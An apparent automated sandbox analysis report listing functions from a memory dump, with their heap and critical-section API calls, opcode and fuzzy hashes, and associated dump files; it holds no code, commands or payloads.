Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 4ccec017b0ee536607989120081f98d6b8866704828526fb8064c28895701adb
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 94C08C32080288BBC7125E45DC00F057B2DE790B60F010020F6040A5618A32EC60E588

Uniqueness

Uniqueness Score: -1.00%

Function 6AB776E2, Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.1105(?,00000000,?,6ABC56E6,6AC566C0,?,6AC584D8,?,?,6AB6E887,?,00000010,00000000,6AC58638), ref: 6AB776F8

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 1bc1792274a43c29367c0d093d633425beb7892b77b04f1c5c322319a7dff164
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 50C08CB46421C05BEB2A4708CE24F243660EB0870CF45019CAB21094A2CBE8E8A3E388

Uniqueness

Uniqueness Score: -1.00%

Function 6AB936CC, Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.1105(?,00000000,00000000,6AB93377,?,00000000,?,?,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE), ref: 6AB936E0

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 5c105364818cef99379317c9be1817c4c1713af06cbc9a22ceab122b66257cfa
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 22C02BB01554C0BBD7190F30CD10F14BA58F700A21F6003A8B220454F0EF389C00F100

Uniqueness

Uniqueness Score: -1.00%

Function 6AB6AD30, Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.1105(?,00000000,00000001,?,6AB902E9,00000000,?,6AB7ECFB,6AC584D8,6AC584D8,6ABB17F0,00000000,?,6AB8F715,6AB8F5C0,?), ref: 6AB6AD43

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: e4efde6f2b634cbaeb3f9217f30ab69b02391a6468bb390ac2ee8ec420aad70e
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 1AC08C32180288BBC7125A49CD00F057B29E790B60F010020F6040A6628A72E8A0E588

Uniqueness

Uniqueness Score: -1.00%

Function 6AB94190, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 175590c6a7dfeeadbeeb5abb91333881fb225fd9a6b890b8f217439b73e8cc0c
Instruction ID: 530e79d9f36a2f13f4df04571ba0f24010d7fe6abb974821df21e63bccf4926d
Opcode Fuzzy Hash: 175590c6a7dfeeadbeeb5abb91333881fb225fd9a6b890b8f217439b73e8cc0c
Instruction Fuzzy Hash: B5C002757115808FCF05CB29C294A0937E4B744748F150890E8058B625EA64E850DA10

Uniqueness

Uniqueness Score: -1.00%

Function 6ABF4248, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.1105(?,6ABF4242,?,6AC408F0,00000008,6ABF426A,6AC408D0,00000008,6AB99B80,?,?,?,?,6AB7ED2D,-00000F38,6AC584D8), ref: 6ABF4251

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection
String ID:
API String ID: 3988221542-0
Opcode ID: f70edb36b298999dcef8c5e05368ba9f0d7253c31339d10b6596c82cb1753443
Instruction ID: df483de84ec4d7e290f074206eb9c47a376d41b2991706f86a59c8b1b1554e83
Opcode Fuzzy Hash: f70edb36b298999dcef8c5e05368ba9f0d7253c31339d10b6596c82cb1753443
Instruction Fuzzy Hash: 8FA011320228808BCB23AB00CAA0A083A20BF00A08F8208A2A002028228A2AC800AA00

Uniqueness

Uniqueness Score: -1.00%

Function 6ABF4320, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.1105(?,6ABF431A,?,6AC408D0,00000008,6AB99B80,?,?,?,?,6AB7ED2D,-00000F38,6AC584D8,6AC584D8,6ABB17F0,00000000), ref: 6ABF4329

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection
String ID:
API String ID: 3988221542-0
Opcode ID: f70edb36b298999dcef8c5e05368ba9f0d7253c31339d10b6596c82cb1753443
Instruction ID: df483de84ec4d7e290f074206eb9c47a376d41b2991706f86a59c8b1b1554e83
Opcode Fuzzy Hash: f70edb36b298999dcef8c5e05368ba9f0d7253c31339d10b6596c82cb1753443
Instruction Fuzzy Hash: 8FA011320228808BCB23AB00CAA0A083A20BF00A08F8208A2A002028228A2AC800AA00

Uniqueness

Uniqueness Score: -1.00%

Function 6AB8F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 6AB8F73F

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 6b7bd4ac6322e13b080291a4ef06667f00097808a3c48c90167ff789446379b3
Instruction ID: 1badb942b4726e6be03b8088a19b132127bf2a1776bfce7179424aa736670492
Opcode Fuzzy Hash: 6b7bd4ac6322e13b080291a4ef06667f00097808a3c48c90167ff789446379b3
Instruction Fuzzy Hash: 151190BD3486C29BF7244E3DC8907167295EF86764F21462AE470CB393DF76C840A340

Uniqueness

Uniqueness Score: -1.00%

Function 6AC267E2, Relevance: .5, Instructions: 473COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f76de3fbfacee04571e7202ea9894f45036191994d7466ae1728e2850c04f9a0
Instruction ID: 354911e46dc0982844306ec7ee9ecdc156859b464ba57126c3f124bd1603b7f7
Opcode Fuzzy Hash: f76de3fbfacee04571e7202ea9894f45036191994d7466ae1728e2850c04f9a0
Instruction Fuzzy Hash: B702E338644A519AE764CF2EC480275BBF1FF46300B15859AE8E5CB281FF39E856DB70

Uniqueness

Uniqueness Score: -1.00%

Function 6AB7B090, Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
Instruction ID: a526e1392444444edf0fe8dc86f15c723d61253100c8458bbf040a929e093bc1
Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
Instruction Fuzzy Hash: 89D1E0317592959BDB71CE28C48065ABBB2EF85314B2A8069DC76CB243EFB1DC41BF50

Uniqueness

Uniqueness Score: -1.00%

Function 6AB60D20, Relevance: .4, Instructions: 372COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8b86f9f0b30412c373c80ff0e1d0e4ac9840795ed3ccb815ff0fabe882ab792
Instruction ID: 21309682ead878cc3f89f1191e669a3437f5ae885c65064b9cce202fa4d4772b
Opcode Fuzzy Hash: b8b86f9f0b30412c373c80ff0e1d0e4ac9840795ed3ccb815ff0fabe882ab792
Instruction Fuzzy Hash: 1CD1F131E442E99BDF58CE9AD0903FDBBB1FB46300F15E06AD811AB295DF748981EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6AB98840, Relevance: .3, Instructions: 340COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25fa1d701f9cefb6730978020afc144c1af5272ab21e7fe31dbec40dfb96f6a2
Instruction ID: 23789bcd6fbe43dc6ac4029d4e980cc21222e09b0a517b7be6b01bd2c1b3623f
Opcode Fuzzy Hash: 25fa1d701f9cefb6730978020afc144c1af5272ab21e7fe31dbec40dfb96f6a2
Instruction Fuzzy Hash: 7DB13B32B545909BD71C9AA8C8B536D2A63EFD7310F1A937DC9129F7E9CE384900B342

Uniqueness

Uniqueness Score: -1.00%

Function 6AB9EBB0, Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
Instruction ID: 7f173d93fb8ef8599dad90ea7254a3773d960500beb49cf959e1229f91481f28
Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
Instruction Fuzzy Hash: 4A815831A483D69BEB255E6CC4D026DBF60FF53700F29467AD8858B353CA25D886F391

Uniqueness

Uniqueness Score: -1.00%

Function 6AB8AB40, Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b53587e67c3cf7f4a747126a532265c6420e6763e242ab398384513234d31f2
Instruction ID: b93239fef8571faec02680ad44d8812a3fc4bacc65c8ee80293716429786c98c
Opcode Fuzzy Hash: 4b53587e67c3cf7f4a747126a532265c6420e6763e242ab398384513234d31f2
Instruction Fuzzy Hash: BB8103B1A002999BDB14CA6DC8907AEB7F1EF81311F17429DD990AB3C5DA31EC11DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6AC1FA2B, Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d01102d8c79d57157d82e9b3783a95cee857f765c5d4cf06644eb49446a51639
Instruction ID: e2ee7d83209611e8f91b7e7bfae943218bb2ac4b884524a218ae7e3c04bf100c
Opcode Fuzzy Hash: d01102d8c79d57157d82e9b3783a95cee857f765c5d4cf06644eb49446a51639
Instruction Fuzzy Hash: BC818074A082559FDB24CF59C4A06ADF7F1FF49304F50815AE891EB281EB749C82EFA4

Uniqueness

Uniqueness Score: -1.00%

Function 6AC21002, Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7014c6ccd5385c91940d09b6f6934275723763d64e8347d9163b9fb59c26003
Instruction ID: 03b72abda1f72dd3c9d250e04ce9e8ad0854eebfbefdaab6980a8105cfc6e234
Opcode Fuzzy Hash: f7014c6ccd5385c91940d09b6f6934275723763d64e8347d9163b9fb59c26003
Instruction Fuzzy Hash: 95719F38A40766DBEB18CF5EC4906BAB3F1FF45301B61446EE892D7640EB72E950CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6AC332A9, Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c9cae4eaf89a6328831437a59b3d8b9d6ee29d3e5fb1aebd19b3737fa4ce309
Instruction ID: 429b330d708340a78d60e5d2c49e5561d600b74f5d9235ee270915c7fbd3b54f
Opcode Fuzzy Hash: 5c9cae4eaf89a6328831437a59b3d8b9d6ee29d3e5fb1aebd19b3737fa4ce309
Instruction Fuzzy Hash: 9B21D1326146258FD758CE2DC880666F7A2FF95310B52C5B8E920C7286FF75E856C790

Uniqueness

Uniqueness Score: -1.00%

Function 6AB64B94, Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be039c21412206f03258b38c48bd730f8b7be0bbe1998d3b1572028778da135b
Instruction ID: 0020bfa97f7e252a517839d308a91be6b414465144471e9e2e6366a34ecbbf94
Opcode Fuzzy Hash: be039c21412206f03258b38c48bd730f8b7be0bbe1998d3b1572028778da135b
Instruction Fuzzy Hash: F631EF71900AA4DFC728CF68C690769F3F4FF48714F1186AAC86997B60EB71B940EB40

Uniqueness

Uniqueness Score: -1.00%

Function 6AB9ABD8, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4485f182b052dc28060a204f4b98fffdbd710f7e71cb1a9f571041eb4735c73
Instruction ID: 66d788043d10af6e1bb1b9d0d33ee7f3d551a85293026f313d71bca0038e63cc
Opcode Fuzzy Hash: d4485f182b052dc28060a204f4b98fffdbd710f7e71cb1a9f571041eb4735c73
Instruction Fuzzy Hash: 072127306046969BCB289F29C8946E2BBF5EF87304F51812ED4D58B641DB20B807EF91

Uniqueness

Uniqueness Score: -1.00%

Function 6AB658EC, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d93fe1b863285050608c83163fa7252c94fe9e548a08b657b4ec7904503a3e5c
Instruction ID: 95f53eee600642d65ef887af86d0fb3b16a894a34180249f96f3610788290266
Opcode Fuzzy Hash: d93fe1b863285050608c83163fa7252c94fe9e548a08b657b4ec7904503a3e5c
Instruction Fuzzy Hash: 6601F731601588ABCB14DF38C8149AE77B9FF81170F8601A9E905EB286DF70ED11E758

Uniqueness

Uniqueness Score: -1.00%

Function 6AB96B90, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
Instruction ID: 9532a899ab8189c576370852974aac68c794fd83a1369ac484b44022dde05db2
Opcode Fuzzy Hash: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
Instruction Fuzzy Hash: A2F06275A04248DFDB18CF58CAA5B9CBBB1EB45310F2140BCE5169B700EA3ADE00EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6AB8C577, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22fbab6658e6ee0239a6b8daa3b757e268f7bd34a17f56f0a678a64feb713fd3
Instruction ID: 02cc77176b1825224ec747025bf3809ac5f2f66e3938859d7370a4b2b4b7ffd9
Opcode Fuzzy Hash: 22fbab6658e6ee0239a6b8daa3b757e268f7bd34a17f56f0a678a64feb713fd3
Instruction Fuzzy Hash: CBF090F291A6D09EDB61871C8006B817BE4DF07772F468666E41587502CFACF880E351

Uniqueness

Uniqueness Score: -1.00%

Function 6AC22073, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionInformationPrintProcessQueryRaiseUniform
String ID:
API String ID: 3936843822-0
Opcode ID: 8176072c37e7012bcc307fb7e5d276707bcf3dda020f78147ffd19e53592574b
Instruction ID: 384b9564264e8ed573382dda436987b0d2fe9b13c69f058b705dda4edcbd6806
Opcode Fuzzy Hash: 8176072c37e7012bcc307fb7e5d276707bcf3dda020f78147ffd19e53592574b
Instruction Fuzzy Hash: 0DF0A77E5395948AEF665F3451257D12BF0D746254F0A04C6F8506B201FE358C93EB64

Uniqueness

Uniqueness Score: -1.00%

Function 6AB64F2E, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a524e6b2f1454829efbaded5d478891bd33bb308e12dfc9a11bdcd8c1810a39
Instruction ID: 4edaa3ebb0d585ed9e8c89372d0b6c3e1a7fab0c85d75be66abdb560eb36866c
Opcode Fuzzy Hash: 2a524e6b2f1454829efbaded5d478891bd33bb308e12dfc9a11bdcd8c1810a39
Instruction Fuzzy Hash: 8EF02EB282A6D48FD3A0C718C240F0277E4EB08778F020260D41687A2AEF28E840E262

Uniqueness

Uniqueness Score: -1.00%

Function 6AB6354C, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02d9277355b99b557f1d7cf7b9214e3ae9278c15d383a290177c1bde8a9fd909
Instruction ID: 3deda2cfe05a0271eaaac26943ada324c8080b9823fcf1d8cf5bffb269176f13
Opcode Fuzzy Hash: 02d9277355b99b557f1d7cf7b9214e3ae9278c15d383a290177c1bde8a9fd909
Instruction Fuzzy Hash: 0BF08C7695A6D89FE361877CC144F22BBE8DF02770F264165F80487A02CF78D880E690

Uniqueness

Uniqueness Score: -1.00%

Function 6AB8E760, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59353bb23d295957739273880e1a9fe3f4bab7500649cdd3583e28476b79572f
Instruction ID: 014bc6cd10d6023963090a7065e22947dd5676217ddd43f8e48cfd4e1a30dc4f
Opcode Fuzzy Hash: 59353bb23d295957739273880e1a9fe3f4bab7500649cdd3583e28476b79572f
Instruction Fuzzy Hash: 72F0A0719592D4DEE351E728D044B0177E8DB06371F054465D504C7122CF78E880E360

Uniqueness

Uniqueness Score: -1.00%

Function 6AB93E70, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap$HeaderImage
String ID:
API String ID: 2000052644-0
Opcode ID: 52c1a01be517ef78f1b4aedf4d3818d09d37ef6852fa5bb60b9eb1c718891785
Instruction ID: 01558f2bc9a8f87f3497d0cdb50365af3912c39406bf87371f9af48dcd563e37
Opcode Fuzzy Hash: 52c1a01be517ef78f1b4aedf4d3818d09d37ef6852fa5bb60b9eb1c718891785
Instruction Fuzzy Hash: DBE0EC396157C89BE754EA5980A8F19BFA59B86724F06802DE40C4B513CF78D880EB25

Uniqueness

Uniqueness Score: -1.00%

